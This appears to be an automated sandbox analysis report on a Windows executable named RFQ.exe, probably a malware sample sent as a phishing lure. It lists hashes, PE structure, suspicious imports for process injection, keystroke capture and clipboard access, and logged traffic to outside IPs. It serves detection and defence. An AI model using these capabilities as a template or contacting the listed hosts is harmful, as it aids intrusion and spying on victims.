                                                                                                                                                  Preview:...e.SBPO...A....UW..aUB..BPOR54HDCKVCGUTQRAIVJ7QSBPOR54.DCKX\.[T.[.h.K{.r.8&!.D:+$97.g65?<.=v(Rq!7>o;[....k;,#0z\_KmVJ7QSBP6S<.u$$.k# .i15.S...k3%.U...t$$.L..h15..?)_l3%.OR54HDCK..GU.PSA@.GjQSBPOR54.DAJ]BLUT.VAIVJ7QSBP.F54HTCKV3CUTQ.AIFJ7QQBPIR54HDCKPCGUTQRAI&N7QQBPOR54JD..VCWUTARAIVZ7QCBPOR54XDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAg"/O%SBPk.14HTCKV.CUTARAIVJ7QSBPOR54hDC+VCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCKVCGUTQRAIVJ7QSBPOR54HDCK

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Entropy (8bit):7.1503033241697915
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                  File name:RFQ.exe
                                                                                                                                                  File size:1'217'024 bytes
                                                                                                                                                  MD5:ecd96717ac8201e049cfa4ca22e88dec
                                                                                                                                                  SHA1:51f5f84261750137131d01824bb817a837441af7
                                                                                                                                                  SHA256:67f01ea4fc25ae9f1a4ab574e0c474bd31ae7d561abc545bb65ca86d26f3daa5
                                                                                                                                                  SHA512:30aeb810de9c33963478d4cc67bd04b65021ea1458b385e2f4cebe610f8149fcb9ad0fc30e6e23630a77db3a8659ecdf30b9f6eba032455b23b2925a1d21588d
                                                                                                                                                  SSDEEP:24576:mtb20pkaCqT5TBWgNQ7aUrLWNYCccT0GoH6A:TVg5tQ7aUrLB1US5
                                                                                                                                                  TLSH:4645DF1273DEC361C3B25273BA667741AEBB782506A1F96B2FD4093CF920122525E773
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                                                                                  Static PE Info

                                                                                                                                                  General

                                                                                                                                                  Entrypoint:0x425f74
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0x6735E622 [Thu Nov 14 11:59:30 2024 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:5
                                                                                                                                                  OS Version Minor:1
                                                                                                                                                  File Version Major:5
                                                                                                                                                  File Version Minor:1
                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                                                                                  Entrypoint Preview

                                                                                                                                                  Instruction
                                                                                                                                                  call 00007F355C8C454Fh
                                                                                                                                                  jmp 00007F355C8B7564h
                                                                                                                                                  int3
                                                                                                                                                  int3
                                                                                                                                                  push edi
                                                                                                                                                  push esi
                                                                                                                                                  mov esi, dword ptr [esp+10h]
                                                                                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                                                                                  mov eax, ecx
                                                                                                                                                  mov edx, ecx
                                                                                                                                                  add eax, esi
                                                                                                                                                  cmp edi, esi
                                                                                                                                                  jbe 00007F355C8B76EAh
                                                                                                                                                  cmp edi, eax
                                                                                                                                                  jc 00007F355C8B7A4Eh
                                                                                                                                                  bt dword ptr [004C0158h], 01h
                                                                                                                                                  jnc 00007F355C8B76E9h
                                                                                                                                                  rep movsb
                                                                                                                                                  jmp 00007F355C8B79FCh
                                                                                                                                                  cmp ecx, 00000080h
                                                                                                                                                  jc 00007F355C8B78B4h
                                                                                                                                                  mov eax, edi
                                                                                                                                                  xor eax, esi
                                                                                                                                                  test eax, 0000000Fh
                                                                                                                                                  jne 00007F355C8B76F0h
                                                                                                                                                  bt dword ptr [004BA370h], 01h
                                                                                                                                                  jc 00007F355C8B7BC0h
                                                                                                                                                  bt dword ptr [004C0158h], 00000000h
                                                                                                                                                  jnc 00007F355C8B788Dh
                                                                                                                                                  test edi, 00000003h
                                                                                                                                                  jne 00007F355C8B789Eh
                                                                                                                                                  test esi, 00000003h
                                                                                                                                                  jne 00007F355C8B787Dh
                                                                                                                                                  bt edi, 02h
                                                                                                                                                  jnc 00007F355C8B76EFh
                                                                                                                                                  mov eax, dword ptr [esi]
                                                                                                                                                  sub ecx, 04h
                                                                                                                                                  lea esi, dword ptr [esi+04h]
                                                                                                                                                  mov dword ptr [edi], eax
                                                                                                                                                  lea edi, dword ptr [edi+04h]
                                                                                                                                                  bt edi, 03h
                                                                                                                                                  jnc 00007F355C8B76F3h
                                                                                                                                                  movq xmm1, qword ptr [esi]
                                                                                                                                                  sub ecx, 08h
                                                                                                                                                  lea esi, dword ptr [esi+08h]
                                                                                                                                                  movq qword ptr [edi], xmm1
                                                                                                                                                  lea edi, dword ptr [edi+08h]
                                                                                                                                                  test esi, 00000007h
                                                                                                                                                  je 00007F355C8B7745h
                                                                                                                                                  bt esi, 03h
                                                                                                                                                  jnc 00007F355C8B7798h
                                                                                                                                                  movdqa xmm1, dqword ptr [esi+00h]

                                                                                                                                                  Rich Headers

                                                                                                                                                  Programming Language:
                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                                                                                                  • [RES] VS2012 UPD4 build 61030
                                                                                                                                                  • [LNK] VS2012 UPD4 build 61030

                                                                                                                                                  Data Directories

                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x60114.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1250000x6c4c.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                  Sections

                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                  .rsrc0xc40000x601140x60200596cee3aca96a38d37ce47026a41c5f0False0.9316304657022106data7.902791634857268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0x1250000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                  RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                  RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                  RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                  RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                                  RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                                  RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                  RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                                  RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                                  RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                                  RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                                  RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                                  RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                                                                                  RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                  RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                  RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                  RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                  RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                  RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                  RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                  RT_RCDATA0xcc7b80x57419data1.000324565404126
                                                                                                                                                  RT_GROUP_ICON0x123bd40x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                  RT_GROUP_ICON0x123c4c0x14dataEnglishGreat Britain1.25
                                                                                                                                                  RT_GROUP_ICON0x123c600x14dataEnglishGreat Britain1.15
                                                                                                                                                  RT_GROUP_ICON0x123c740x14dataEnglishGreat Britain1.25
                                                                                                                                                  RT_VERSION0x123c880xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                  RT_MANIFEST0x123d640x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                  UxTheme.dllIsThemeActive
                                                                                                                                                  KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                                                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                                                                                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                                                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                                                                                  Possible Origin

                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  EnglishGreat Britain

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Nov 14, 2024 15:39:39.932410955 CET4980380192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:39:39.937349081 CET80498033.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:39.937414885 CET4980380192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:39:39.945863962 CET4980380192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:39:39.951368093 CET80498033.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:40.575146914 CET80498033.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:40.575752974 CET80498033.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:40.577222109 CET4980380192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:39:40.578584909 CET4980380192.168.2.53.33.130.190
                                                                                                                                                  Nov 14, 2024 15:39:40.583719969 CET80498033.33.130.190192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:55.697253942 CET4988180192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:55.702184916 CET8049881217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:55.702254057 CET4988180192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:55.714243889 CET4988180192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:55.719182968 CET8049881217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:56.510382891 CET8049881217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:56.559369087 CET4988180192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:56.621045113 CET8049881217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:56.621253967 CET4988180192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:57.215694904 CET4988180192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:58.233779907 CET4989080192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:58.238950014 CET8049890217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:58.239054918 CET4989080192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:58.248111010 CET4989080192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:58.254093885 CET8049890217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:59.079838037 CET8049890217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:59.121915102 CET4989080192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:59.190763950 CET8049890217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:39:59.190938950 CET4989080192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:39:59.762579918 CET4989080192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:00.785245895 CET4990580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:00.790322065 CET8049905217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:00.790393114 CET4990580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:00.802840948 CET4990580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:00.808111906 CET8049905217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:00.808269978 CET8049905217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:01.654900074 CET8049905217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:01.700009108 CET4990580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:01.765337944 CET8049905217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:01.766062021 CET4990580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:02.309573889 CET4990580192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:03.355462074 CET4991780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:03.360660076 CET8049917217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:03.360791922 CET4991780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:03.401639938 CET4991780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:03.406642914 CET8049917217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:04.188254118 CET8049917217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:04.188272953 CET8049917217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:04.188283920 CET8049917217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:04.188508034 CET4991780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:04.290719986 CET8049917217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:04.290952921 CET4991780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:04.291794062 CET4991780192.168.2.5217.70.184.50
                                                                                                                                                  Nov 14, 2024 15:40:04.298053980 CET8049917217.70.184.50192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:09.373855114 CET4995280192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:09.379031897 CET8049952199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:09.379229069 CET4995280192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:09.389461994 CET4995280192.168.2.5199.59.243.227
                                                                                                                                                  Nov 14, 2024 15:40:09.394743919 CET8049952199.59.243.227192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:40:10.018647909 CET8049952199.59.243.227192.168.2.5
